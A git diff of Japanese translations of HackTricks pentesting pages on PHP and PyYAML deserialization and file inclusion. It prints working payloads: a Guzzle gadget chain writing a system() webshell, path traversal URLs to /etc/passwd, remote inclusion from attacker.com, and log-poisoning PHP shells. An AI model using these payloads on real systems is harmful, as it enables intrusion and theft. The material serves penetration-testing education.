 ```
-- さて、**ファイルを作成して書き込む**ことはできますが、ユーザーは**ウェブサーバー内の任意のフォルダーに書き込むことができません**。したがって、ペイロードに見られるように、PHPが**`system`**を呼び出し、いくつかの**base64**が**`/tmp/a.php`**に作成されます。次に、**最初のタイプのペイロードを再利用**して、他のウェブアプリのコンポーザーローダーを読み込むために、生成された**`/tmp/a.php`**ファイルを読み込みます。それをデシリアライズガジェットに追加するだけです:&#x20;
+- さて、**ファイルを作成して書き込む**ことができますが、ユーザーは**ウェブサーバー内の任意のフォルダーに書き込むことができません**。したがって、ペイロードに示されているように、PHPが**`system`**を呼び出し、いくつかの**base64**が**`/tmp/a.php`**に作成されます。次に、**最初のタイプのペイロードを再利用**して、他のウェブアプリのコンポーザーローダーを読み込み、生成された**`/tmp/a.php`**ファイルを読み込むことができます。それをデシリアライズガジェットに追加するだけです:&#x20;
 ```php
 a:3:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}s:6:"Extra3";O:5:"tmp_a":0:{}}
 ```
 **ペイロードの概要**
 
-- **同じコンテナ内の別のウェブアプリのcomposerオートロードを読み込む**
-- **phpggcガジェットを読み込む** ことで、他のウェブアプリのライブラリを悪用する（最初のウェブアプリはデシリアライズに脆弱で、ライブラリにガジェットがなかった）
-- ガジェットは、/tmp/a.phpに悪意のあるコマンドを含む**PHPペイロードのファイルを作成する**
-- ペイロードの最終部分は、**生成されたPHPファイルを読み込む**ことでコマンドを実行する
+- **異なるウェブアプリのcomposerオートロードを読み込む** 同じコンテナ内で
+- **phpggcガジェットを読み込む** 他のウェブアプリのライブラリを悪用するために（最初のウェブアプリはデシリアライズに脆弱で、ライブラリにガジェットがなかった）
+- ガジェットは **/tmp/a.php にPHPペイロード** を含むファイルを作成し、悪意のあるコマンドを実行する（ウェブアプリのユーザーはどのウェブアプリのフォルダーにも書き込むことができない）
+- ペイロードの最終部分は **生成されたPHPファイルを読み込む** ことでコマンドを実行する
 
-私はこのデシリアライズを**2回呼び出す必要があった**。私のテストでは、最初の時に`/tmp/a.php`ファイルが作成されたが読み込まれず、2回目には正しく読み込まれた。 
+私はこのデシリアライズを **2回呼び出す必要があった**。私のテストでは、最初の時に `/tmp/a.php` ファイルが作成されたが読み込まれず、2回目には正しく読み込まれた。 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/deserialization/python-yaml-deserialization.md b/src/pentesting-web/deserialization/python-yaml-deserialization.md
index 423432f43..c2d7a2cff 100644
--- a/src/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/src/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -22,7 +22,7 @@ print(yaml.dump(range(1,10)))
 - 10
 - 1
 ```
-**タプル**が生のデータ型ではなく、そのため**シリアライズ**されたことを確認してください。そして、**range**（ビルトインから取得）でも同じことが起こりました。
+チェックしてみてください、**tuple**は生のデータ型ではないため、**serialized**されました。そして、**range**（ビルトインから取得）でも同じことが起こりました。
 
 ![](<../../images/image (1040).png>)
 
@@ -68,7 +68,7 @@ print(yaml.unsafe_load_all(data))
 
 **古いバージョン**のpyyamlは、何かを読み込む際に**Loaderを指定しなかった場合**、デシリアライズ攻撃に対して脆弱でした: `yaml.load(data)`
 
-[**脆弱性の説明はこちら**](https://hackmd.io/@defund/HJZajCVlP)**で見つけることができます。** 提案された**エクスプロイト**は次の通りです:
+[**脆弱性の説明はこちら**](https://hackmd.io/@defund/HJZajCVlP)**で見つけることができます。** 提案された**エクスプロイト**は次のとおりです:
 ```yaml
 !!python/object/new:str
 state: !!python/tuple
@@ -87,11 +87,11 @@ state:
 ],
 }
 ```
-注意してください、**最近のバージョン**では、**`Loader`**なしで**`.load()`**を**呼び出すことはできません**、そして**`FullLoader`**はこの攻撃に**もはや脆弱ではありません**。
+最近のバージョンでは、`Loader`なしで`.load()`を呼び出すことはできず、`FullLoader`はこの攻撃に対して脆弱ではなくなりました。
 
 ## RCE
 
-カスタムペイロードは、**PyYAML**や**ruamel.yaml**などのPython YAMLモジュールを使用して作成できます。これらのペイロードは、適切なサニタイズなしで信頼できない入力をデシリアライズするシステムの脆弱性を悪用することができます。
+カスタムペイロードは、**PyYAML**や**ruamel.yaml**などのPython YAMLモジュールを使用して作成できます。これらのペイロードは、適切なサニタイズなしに信頼できない入力をデシリアライズするシステムの脆弱性を悪用することができます。
 ```python
 import yaml
 from yaml import UnsafeLoader, FullLoader, Loader
@@ -111,9 +111,9 @@ print(yaml.load(deserialized_data, Loader=UnsafeLoader))
 print(yaml.load(deserialized_data, Loader=Loader))
 print(yaml.unsafe_load(deserialized_data))
 ```
-### ペイロードを作成するためのツール
+### Payloadを作成するためのツール
 
-ツール [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) は、**Pickle, PyYAML, jsonpickle および ruamel.yaml** を悪用するための Python デシリアライズペイロードを生成するために使用できます。
+ツール [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) は、**Pickle, PyYAML, jsonpickle, ruamel.yaml** を悪用するためのPythonデシリアライズペイロードを生成するために使用できます。
 ```bash
 python3 peas.py
 Enter RCE command :cat /root/flag.txt
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index 54ace6964..73a09fd17 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -1,4 +1,4 @@
-# ファイルインクルージョン/パス横断
+# ファイルインクルージョン/パストラバーサル
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -26,7 +26,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 `/`を`\`に変更してみてください。\
 `../../../../../`を追加してみてください。
 
-ファイル/etc/passwordを見つけるためにいくつかの技術を使用したリスト（脆弱性が存在するか確認するため）は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)にあります。
+ファイル/etc/passwordを見つけるためにいくつかの技術を使用したリスト（脆弱性が存在するか確認するため）は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)で見つけることができます。
 
 ### **Windows**
 
@@ -37,7 +37,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 `/`を`\`に変更してみてください。\
 `C:/`を削除して`../../../../../`を追加してみてください。
 
-ファイル/boot.iniを見つけるためにいくつかの技術を使用したリスト（脆弱性が存在するか確認するため）は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)にあります。
+ファイル/boot.iniを見つけるためにいくつかの技術を使用したリスト（脆弱性が存在するか確認するため）は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)で見つけることができます。
 
 ### **OS X**
 
@@ -49,7 +49,7 @@ LinuxのLFIリストを確認してください。
 ```
 http://example.com/index.php?page=../../../etc/passwd
 ```
-### トラバーサルシーケンスが非再帰的に除去されました
+### トラバーサルシーケンスが非再帰的に削除されました
 ```python
 http://example.com/index.php?page=....//....//....//etc/passwd
 http://example.com/index.php?page=....\/....\/....\/etc/passwd
@@ -57,7 +57,7 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
 ```
 ### **ヌルバイト (%00)**
 
-提供された文字列の末尾にさらに文字を追加するのをバイパスします (バイパス: $\_GET\['param']."php")
+提供された文字列の末尾に文字を追加するのをバイパスします (バイパス: $\_GET\['param']."php")
 ```
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
@@ -86,7 +86,7 @@ http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
 ```bash
 http://example.com/index.php?page=../../../etc/passwd # depth of 3
 ```
-2. **フォルダを調査する:** 疑わしいフォルダの名前（例: `private`）をURLに追加し、その後`/etc/passwd`に移動します。追加のディレクトリレベルは深さを1つ増やす必要があります:
+2. **フォルダを調査する:** 疑わしいフォルダの名前（例: `private`）をURLに追加し、その後`/etc/passwd`に戻ります。追加のディレクトリレベルは深さを1つ増やす必要があります:
 ```bash
 http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
 ```
@@ -101,15 +101,15 @@ http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
 ```
 ### **パストランケーション技術**
 
-パストランケーションは、ウェブアプリケーションにおけるファイルパスを操作するために使用される手法です。これは、ファイルパスの末尾に追加の文字を付加する特定のセキュリティ対策を回避することによって、制限されたファイルにアクセスするためにしばしば使用されます。目的は、セキュリティ対策によって変更された場合でも、望ましいファイルを指すファイルパスを作成することです。
+パストランケーションは、ウェブアプリケーションにおけるファイルパスを操作するために使用される手法です。これは、ファイルパスの末尾に追加の文字を付加する特定のセキュリティ対策を回避することによって、制限されたファイルにアクセスするためにしばしば使用されます。目的は、セキュリティ対策によって変更された場合でも、望ましいファイルを指し示すファイルパスを作成することです。
 
 PHPでは、ファイルシステムの性質により、ファイルパスのさまざまな表現が同等と見なされることがあります。例えば：
 
 - `/etc/passwd`、`/etc//passwd`、`/etc/./passwd`、および`/etc/passwd/`はすべて同じパスとして扱われます。
-- 最後の6文字が`passwd`の場合、`/`を追加しても（`passwd/`にする）ターゲットファイルは変わりません。
-- 同様に、ファイルパスに`.php`を追加した場合（`shellcode.php`のように）、末尾に`/.`を追加してもアクセスされるファイルは変更されません。
+- 最後の6文字が`passwd`の場合、`/`を追加して`passwd/`にしても、ターゲットファイルは変わりません。
+- 同様に、ファイルパスに`.php`を追加した場合（例えば`shellcode.php`）、末尾に`/.`を追加しても、アクセスされるファイルは変更されません。
 
-提供された例は、パストランケーションを利用して、敏感な内容（ユーザーアカウント情報）を持つ一般的なターゲットである`/etc/passwd`にアクセスする方法を示しています：
+提供された例は、敏感な内容（ユーザーアカウント情報）を含む一般的なターゲットである`/etc/passwd`にアクセスするためにパストランケーションを利用する方法を示しています：
 ```
 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
@@ -122,8 +122,8 @@ http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/pas
 これらのシナリオでは、必要なトラバーサルの数は約2027回になる可能性がありますが、この数はサーバーの構成によって異なる場合があります。
 
 - **ドットセグメントと追加文字の使用**: トラバーサルシーケンス（`../`）に追加のドットセグメントや文字を組み合わせることで、ファイルシステムをナビゲートし、サーバーによって追加された文字列を効果的に無視することができます。
-- **必要なトラバーサルの数を決定する**: 試行錯誤を通じて、ルートディレクトリに移動し、その後`/etc/passwd`に移動するために必要な正確な`../`シーケンスの数を見つけることができ、追加された文字列（`.php`など）が無効化される一方で、目的のパス（`/etc/passwd`）はそのまま保持されます。
-- **偽のディレクトリから始める**: 存在しないディレクトリ（`a/`など）でパスを始めるのは一般的な慣行です。この技術は予防措置として、またはサーバーのパス解析ロジックの要件を満たすために使用されます。
+- **必要なトラバーサルの数の特定**: 試行錯誤を通じて、ルートディレクトリに移動し、その後`/etc/passwd`に移動するために必要な正確な`../`シーケンスの数を見つけることができ、追加された文字列（`.php`など）が無効化される一方で、目的のパス（`/etc/passwd`）はそのまま保持されます。
+- **偽のディレクトリから始める**: 存在しないディレクトリ（`a/`など）でパスを始めるのは一般的な慣行です。この技術は、予防措置として、またはサーバーのパス解析ロジックの要件を満たすために使用されます。
 
 パストランケーション技術を使用する際は、サーバーのパス解析の挙動とファイルシステムの構造を理解することが重要です。各シナリオには異なるアプローチが必要な場合があり、最も効果的な方法を見つけるためにはテストがしばしば必要です。
 
@@ -139,7 +139,7 @@ http://example.com/index.php?page=PhP://filter
 ```
 ## リモートファイルインクルージョン
 
-phpでは、これはデフォルトで無効になっています。なぜなら**`allow_url_include`**が**オフ**だからです。これが**オン**でなければ機能しません。その場合、サーバーからPHPファイルをインクルードしてRCEを取得することができます。
+phpでは、これはデフォルトで無効になっています。なぜなら**`allow_url_include`**が**オフ**だからです。これが**オン**でなければ機能せず、その場合、サーバーからPHPファイルをインクルードしてRCEを取得することができます。
 ```python
 http://example.com/index.php?page=http://atacker.com/mal.php
 http://example.com/index.php?page=\\attacker.com\shared\mal.php
@@ -167,17 +167,17 @@ os.path.join(os.getcwd(), "public", file_name)
 os.path.join(os.getcwd(), "public", "/etc/passwd")
 '/etc/passwd'
 ```
-意図された動作は、[the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join) によると次の通りです：
+意図された動作は、[the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join) によると次のとおりです：
 
-> コンポーネントが絶対パスである場合、すべての前のコンポーネントは破棄され、結合は絶対パスコンポーネントから続行されます。
+> コンポーネントが絶対パスである場合、すべての以前のコンポーネントは破棄され、結合は絶対パスコンポーネントから続行されます。
 
 ## Java ディレクトリのリスト
 
-Javaでパストラバーサルがある場合、**ファイルの代わりにディレクトリを要求すると、** **ディレクトリのリストが返されます**。これは他の言語では発生しないでしょう（私の知る限りでは）。
+Javaでパストラバーサルがある場合、**ファイルの代わりにディレクトリを要求すると、** **ディレクトリのリストが返されます**。これは他の言語では発生しないでしょう（私の知る限り）。
 
-## トップ25パラメータ
+## トップ 25 パラメータ
 
-ローカルファイルインクルージョン（LFI）脆弱性に対して脆弱である可能性のあるトップ25パラメータのリストです（[link](https://twitter.com/trbughunters/status/1279768631845494787) から）：
+ローカルファイルインクルージョン（LFI）脆弱性に対して脆弱である可能性のあるトップ25のパラメータのリストです（[link](https://twitter.com/trbughunters/status/1279768631845494787) から）：
 ```
 ?cat={payload}
 ?dir={payload}
@@ -222,18 +222,18 @@ PHPフィルターは、データが読み込まれる前または書き込ま
 - `convert.base64-decode`
 - `convert.quoted-printable-encode`
 - `convert.quoted-printable-decode`
-- `convert.iconv.*` : 別のエンコーディングに変換します（`convert.iconv.<input_enc>.<output_enc>`）。**サポートされているすべてのエンコーディングのリスト**を取得するには、コンソールで `iconv -l` を実行します。
+- `convert.iconv.*` : 異なるエンコーディングに変換します（`convert.iconv.<input_enc>.<output_enc>`）。**サポートされているすべてのエンコーディングのリスト**を取得するには、コンソールで `iconv -l` を実行します。
 
 > [!WARNING]
-> `convert.iconv.*` 変換フィルターを悪用することで、**任意のテキストを生成**することができ、任意のテキストを記述したり、includeプロセスを任意のテキストで実行するような関数を作成するのに役立ちます。詳細については、[**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)を確認してください。
+> `convert.iconv.*` 変換フィルターを悪用することで、**任意のテキストを生成**することができ、任意のテキストを記述したり、includeプロセスを任意のテキストで実行するために役立つ可能性があります。詳細については、[**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)を確認してください。
 
 - [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
-- `zlib.deflate`: コンテンツを圧縮します（多くの情報を外部に抽出する場合に便利）
+- `zlib.deflate`: コンテンツを圧縮します（多くの情報を外部に送信する場合に便利）
 - `zlib.inflate`: データを解凍します
 - [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
 - `mcrypt.*` : 非推奨
 - `mdecrypt.*` : 非推奨
-- その他のフィルター
+- Other Filters
 - phpで `var_dump(stream_get_filters());` を実行すると、いくつかの**予期しないフィルター**を見つけることができます：
 - `consumed`
 - `dechunk`: HTTPチャンクエンコーディングを逆転させます
@@ -269,30 +269,30 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
 
 ### phpフィルタをオラクルとして使用して任意のファイルを読み取る
 
-[**この投稿**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle)では、サーバーからの出力を返さずにローカルファイルを読み取る技術が提案されています。この技術は、**phpフィルタをオラクルとして使用したファイルのブール型抽出（文字ごと）**に基づいています。これは、phpフィルタを使用してテキストを大きくし、phpが例外をスローするようにするためです。
+[**この投稿**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle)では、サーバーからの出力を返さずにローカルファイルを読み取る技術が提案されています。この技術は、**phpフィルタをオラクルとして使用してファイルをブール的に抽出する（文字ごとに）**ことに基づいています。これは、phpフィルタを使用してテキストを大きくし、phpが例外をスローするようにするためです。
 
 元の投稿には技術の詳細な説明がありますが、ここでは簡単な要約を示します：
 
-- コーデック**`UCS-4LE`**を使用して、テキストの先頭に先行文字を残し、文字列のサイズを指数関数的に増加させます。
+- コーデック**`UCS-4LE`**を使用して、テキストの先頭に先行文字を置き、文字列のサイズを指数関数的に増加させます。
 - これは、**最初の文字が正しく推測されたときに非常に大きなテキストを生成するために使用され**、phpが**エラー**をトリガーします。
-- **dechunk**フィルタは、**最初の文字が16進数でない場合はすべてを削除**するため、最初の文字が16進数であるかどうかを知ることができます。
-- これに加えて前述のもの（および推測された文字に応じた他のフィルタ）を組み合わせることで、テキストの最初の文字を推測することができます。十分な変換を行うことで、それが16進数文字でなくなるのを確認します。なぜなら、16進数であれば、dechunkはそれを削除せず、初期の爆弾がphpエラーを引き起こすからです。
-- コーデック**convert.iconv.UNICODE.CP930**は、各文字を次の文字に変換します（このコーデックの後：a -> b）。これにより、最初の文字が`a`であるかどうかを発見できます。たとえば、6回このコーデックを適用すると、a->b->c->d->e->f->gとなり、文字はもはや16進数文字ではなくなります。したがって、dechunkはそれを削除せず、phpエラーが初期の爆弾とともにトリガーされます。
+- **dechunk**フィルタは、最初の文字が16進数でない場合は**すべてを削除**するため、最初の文字が16進数かどうかを知ることができます。
+- これに加えて前述のもの（および推測された文字に応じた他のフィルタ）を組み合わせることで、テキストの最初の文字を推測することができます。十分な変換を行うことで、それが16進数文字でなくなるのを確認します。なぜなら、16進数の場合、dechunkはそれを削除せず、初期の爆弾がphpエラーを引き起こすからです。
+- コーデック**convert.iconv.UNICODE.CP930**は、各文字を次の文字に変換します（このコーデックの後：a -> b）。これにより、最初の文字が`a`であるかどうかを発見できます。たとえば、6回このコーデックを適用するとa->b->c->d->e->f->gとなり、文字はもはや16進数文字ではなくなります。したがって、dechunkはそれを削除せず、phpエラーが初期の爆弾によってトリガーされます。
 - **rot13**のような他の変換を最初に使用することで、n、o、p、q、rなどの他の文字を漏洩させることが可能です（他のコーデックを使用して他の文字を16進数範囲に移動させることができます）。
-- 最初の文字が数字の場合、それをbase64エンコードし、最初の2文字を漏洩させて数字を漏洩させる必要があります。
+- 最初の文字が数字の場合、それをbase64エンコードし、数字を漏洩させるために最初の2文字を漏洩させる必要があります。
 - 最後の問題は、**最初の文字以上のものを漏洩させる方法**です。**convert.iconv.UTF16.UTF-16BE、convert.iconv.UCS-4.UCS-4LE、convert.iconv.UCS-4.UCS-4LE**のような順序メモリフィルタを使用することで、文字の順序を変更し、テキストの最初の位置に他の文字を取得することが可能です。
-- さらに**データを取得する**ためのアイデアは、**最初に2バイトのジャンクデータを生成**し、**convert.iconv.UTF16.UTF16**を適用し、**UCS-4LE**を使用して**次の2バイトとピボットさせ**、**ジャンクデータまでデータを削除**することです（これにより、初期テキストの最初の2バイトが削除されます）。これを繰り返して、漏洩させたいビットに到達するまで続けます。
+- さらに**データを取得する**ためのアイデアは、**最初に2バイトのジャンクデータを生成**し、**convert.iconv.UTF16.UTF16**を適用し、**UCS-4LE**を使用して次の2バイトと**ピボット**し、**ジャンクデータまでデータを削除**することです（これにより、初期テキストの最初の2バイトが削除されます）。これを希望するビットを漏洩させるまで続けます。
 
 投稿には、これを自動的に実行するツールも漏洩しています：[php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit)。
 
 ### php://fd
 
-このラッパーは、プロセスがオープンしているファイルディスクリプタにアクセスすることを可能にします。開いているファイルの内容を抽出するのに潜在的に役立ちます：
+このラッパーは、プロセスがオープンしているファイル記述子にアクセスすることを可能にします。開いているファイルの内容を抽出するのに潜在的に役立ちます：
 ```php
 echo file_get_contents("php://fd/3");
 $myfile = fopen("/etc/passwd", "r");
 ```
-**php://stdin、php://stdout、php://stderr**を使用して、それぞれ**ファイルディスクリプタ0、1、2**にアクセスすることもできます（攻撃にどのように役立つかは不明です）。
+**php://stdin、php://stdout、php://stderr**を使用して、それぞれ**ファイルディスクリプタ0、1、2**にアクセスできます（攻撃にどのように役立つかは不明です）。
 
 ### zip:// と rar://
 
@@ -326,7 +326,7 @@ NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
 
 ### expect://
 
-Expectを有効にする必要があります。これを使用してコードを実行できます:
+Expectを有効にする必要があります。これを使用してコードを実行できます：
 ```
 http://example.com/index.php?page=expect://id
 http://example.com/index.php?page=expect://ls
@@ -352,11 +352,11 @@ $phar->stopBuffering();
 ```bash
 php --define phar.readonly=0 create_path.php
 ```
-実行時に `test.phar` というファイルが作成され、これを利用してローカルファイルインクルージョン (LFI) 脆弱性を悪用する可能性があります。
+実行時に、`test.phar`という名前のファイルが作成され、これを利用してローカルファイルインクルージョン（LFI）脆弱性を悪用する可能性があります。
 
-LFI が PHP コードを実行せずにファイルを読み取るだけの場合、`file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()`、または `filesize()` などの関数を通じて、デシリアライズ脆弱性の悪用を試みることができます。この脆弱性は、`phar` プロトコルを使用してファイルを読み取ることに関連しています。
+LFIがファイルを読み取るだけで、PHPコードを実行しない場合、`file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()`、または`filesize()`などの関数を通じて、デシリアライズ脆弱性の悪用を試みることができます。この脆弱性は、`phar`プロトコルを使用してファイルを読み取ることに関連しています。
 
-`.phar` ファイルのコンテキストにおけるデシリアライズ脆弱性の悪用についての詳細な理解は、以下のリンクされた文書を参照してください：
+`.phar`ファイルのデシリアライズ脆弱性を悪用する詳細な理解については、以下のリンクされた文書を参照してください：
 
 [Phar Deserialization Exploitation Guide](phar-deserialization.md)
 
@@ -366,32 +366,32 @@ phar-deserialization.md
 
 ### CVE-2024-2961
 
-**php フィルターをサポートする任意のファイルを PHP から読み取ることを悪用して RCE を得ることが可能でした。** 詳細な説明は[**この投稿で見つけることができます**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
-非常に簡単な要約：PHP ヒープ内の **3 バイトオーバーフロー** を悪用して、特定のサイズのフリーチャンクのチェーンを **変更し、任意のアドレスに何でも書き込むことができるようにしました**。そのため、**`system`** を呼び出すフックが追加されました。\
-特定のサイズのチャンクを割り当てることが、他の PHP フィルターを悪用して可能でした。
+**phpフィルターをサポートする任意のファイルをPHPから読み取ることを悪用してRCEを取得することが可能でした。** 詳細な説明は[**この投稿で見つけることができます**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
+非常に簡単な要約：PHPヒープの**3バイトオーバーフロー**が悪用され、特定のサイズのフリーチャンクのチェーンを**変更するために**、**任意のアドレスに何でも書き込むことができるように**、フックが追加されて**`system`**を呼び出しました。\
+特定のサイズのチャンクを割り当てることが可能で、さらに多くのPHPフィルターを悪用しました。
 
-### その他のプロトコル
+### さらなるプロトコル
 
-ここに含める可能性のある[ **プロトコルをもっと確認してください**](https://www.php.net/manual/en/wrappers.php)**:**
+ここに含める可能性のある[ **プロトコルを確認してください**](https://www.php.net/manual/en/wrappers.php)**:**
 
-- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — メモリまたは一時ファイルに書き込む (ファイルインクルージョン攻撃でどのように役立つかは不明)
+- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — メモリまたは一時ファイルに書き込む（ファイルインクルージョン攻撃でどのように役立つかは不明）
 - [file://](https://www.php.net/manual/en/wrappers.file.php) — ローカルファイルシステムへのアクセス
-- [http://](https://www.php.net/manual/en/wrappers.http.php) — HTTP(S) URL へのアクセス
-- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — FTP(S) URL へのアクセス
+- [http://](https://www.php.net/manual/en/wrappers.http.php) — HTTP(S) URLへのアクセス
+- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — FTP(S) URLへのアクセス
 - [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — 圧縮ストリーム
-- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — パターンに一致するパス名を見つける (何も印刷可能なものを返さないので、ここではあまり役に立たない)
-- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — セキュアシェル 2
-- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — オーディオストリーム (任意のファイルを読むには役に立たない)
+- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — パターンに一致するパス名を見つける（何も印刷可能なものを返さないので、ここではあまり役に立たない）
+- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — セキュアシェル2
+- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — オーディオストリーム（任意のファイルを読むには役に立たない）
 
-## PHP の 'assert' を介した LFI
+## PHPの'assert'によるLFI
 
-PHP におけるローカルファイルインクルージョン (LFI) リスクは、文字列内でコードを実行できる 'assert' 関数を扱う際に特に高くなります。これは、".." のようなディレクトリトラバーサル文字を含む入力がチェックされているが、適切にサニタイズされていない場合に特に問題です。
+PHPにおけるローカルファイルインクルージョン（LFI）のリスクは、文字列内でコードを実行できる'assert'関数を扱う際に特に高くなります。これは、".."のようなディレクトリトラバーサル文字を含む入力がチェックされているが、適切にサニタイズされていない場合に特に問題です。
 
-例えば、PHP コードは次のようにディレクトリトラバーサルを防ぐように設計されることがあります：
+例えば、PHPコードは次のようにディレクトリトラバーサルを防ぐように設計されることがあります：
 ```bash
 assert("strpos('$file', '..') === false") or die("");
 ```
-この対策はトラバーサルを防ぐことを目的としていますが、意図せずコードインジェクションのベクターを作成します。ファイルの内容を読み取るためにこれを悪用するには、攻撃者は次のようにすることができます：
+この対策はトラバーサルを防ぐことを目的としていますが、意図せずコードインジェクションのベクターを作成します。ファイルの内容を読み取るためにこれを悪用するには、攻撃者は次のように使用できます：
 ```plaintext
 ' and die(highlight_file('/etc/passwd')) or '
 ```
@@ -404,7 +404,7 @@ assert("strpos('$file', '..') === false") or die("");
 ## PHPブラインドパススラベル
 
 > [!WARNING]
-> この技術は、**PHP関数**の**ファイルパス**を**制御**できる場合に関連していますが、ファイルの内容は表示されません（**`file()`**への単純な呼び出しのように）が、内容は表示されません。
+> この技術は、**ファイルパス**を**制御**できる**PHP関数**が**ファイルにアクセス**する場合に関連していますが、ファイルの内容は表示されません（**`file()`**への単純な呼び出しのように）が、内容は表示されません。
 
 [**この素晴らしい投稿**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)では、ブラインドパススラベルがPHPフィルターを介して**エラーオラクルを介してファイルの内容を抽出する**方法が説明されています。
 
@@ -427,9 +427,9 @@ assert("strpos('$file', '..') === false") or die("");
 ApacheまたはNginxサーバーが**LFIに脆弱**な場合、インクルード関数内で**`/var/log/apache2/access.log`または`/var/log/nginx/access.log`**にアクセスし、**ユーザーエージェント**内または**GETパラメータ**内に**`<?php system($_GET['c']); ?>`**のようなPHPシェルを設定し、そのファイルをインクルードすることができます。
 
 > [!WARNING]
-> シェルに**シングルクォート**の代わりに**ダブルクォート**を使用すると、ダブルクォートは文字列"_**quote;**_"に変更され、**PHPはそこでエラーをスローし**、**他の何も実行されません**。
+> シェルに**シングルクォート**の代わりに**ダブルクォート**を使用すると、ダブルクォートは"_**quote;**_"という文字列に変更され、**PHPはそこでエラーをスローし**、**他の何も実行されません**。
 >
-> また、**ペイロードを正しく記述する**ことを確認してください。さもなければ、PHPはログファイルを読み込もうとするたびにエラーを出し、二度と機会がありません。
+> また、**ペイロードを正しく記述することを確認してください**。さもなければ、PHPはログファイルを読み込もうとするたびにエラーを出し、二度とチャンスはありません。
 
 他のログでもこれを行うことができますが、**注意してください**。ログ内のコードはURLエンコードされている可能性があり、これがシェルを破壊する可能性があります。ヘッダー**authorization "basic"**には、Base64で"ユーザー:パスワード"が含まれており、ログ内でデコードされます。PHPShellはこのヘッダー内に挿入できます。\
 他の可能なログパス:
@@ -448,7 +448,7 @@ Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzin
 
 ### メール経由
 
-**メールを送信**して、PHPペイロードを含む内部アカウント (user@localhost) に送信します。ペイロードは `<?php echo system($_REQUEST["cmd"]); ?>` のようにし、ユーザーのメールに **`/var/mail/<USERNAME>`** または **`/var/spool/mail/<USERNAME>`** のようなパスを使って含めてみてください。
+**メールを送信** して、PHPペイロード `<?php echo system($_REQUEST["cmd"]); ?>` を含む内部アカウント (user@localhost) に送信し、**`/var/mail/<USERNAME>`** または **`/var/spool/mail/<USERNAME>`** のようなパスでユーザーのメールに含めることを試みます。
 
 ### /proc/\*/fd/\* 経由
 
@@ -457,7 +457,7 @@ Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzin
 
 ### /proc/self/environ 経由
 
-ログファイルのように、User-Agentにペイロードを送信します。これにより、/proc/self/environファイル内に反映されます。
+ログファイルのように、User-Agent にペイロードを送信します。これにより、/proc/self/environ ファイル内に反映されます。
 ```
 GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
 User-Agent: <?=phpinfo(); ?>
